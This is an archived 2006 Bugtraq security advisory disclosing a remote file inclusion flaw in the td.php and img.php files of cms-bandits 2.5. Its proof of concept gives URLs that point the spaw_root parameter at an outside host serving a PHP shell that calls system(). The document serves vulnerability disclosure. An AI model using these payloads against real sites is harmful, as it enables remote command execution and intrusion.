lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4487E962.2060103@autistici.org>
Date: Thu, 08 Jun 2006 11:09:54 +0200
From: Federico Fazzi <federico@...istici.org>
To: secunia-vuln-report <vuln@...unia.com>,
	packetstorm <submissions@...ketstormsecurity.org>,
	bugtraq@...urityfocus.com
Subject: cms-bandits 2.5, Remote command execution


-----------------------------------------------------
Advisory id: FSA:006

Author:    Federico Fazzi
Date:      08/06/2006, 11:09
Sinthesis: cms-bandits 2.5, Remote command execution
Type:      high
Product:   http://sourceforge.net/projects/cms-bandits
Patch:     unavailable
-----------------------------------------------------


1) Description:

Error occured in td.php,

include $spaw_root.'class/util.class.php';
include $spaw_root.'class/lang.class.php';


Error occured in img.php,

include $spaw_root.'class/util.class.php';
include $spaw_root.'class/lang.class.php';

required register_global = On,
The users can include a remote file because
the $spaw_root is undeclare.

2) Proof of concept:

http://127.0.0.1/cms/dialogs/td.php?spaw_root=[cmd_with_final_slash]
http://127.0.0.1/cms/dialogs/img.php?spaw_root=[cmd_with_final_slash]
[cmd_with_final_slash] = http://example/cmd.php/
cmd.php = <?php system("commands here"); or passthru ?>

3) Solution:

sanitized the variable on img.php, td.php.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ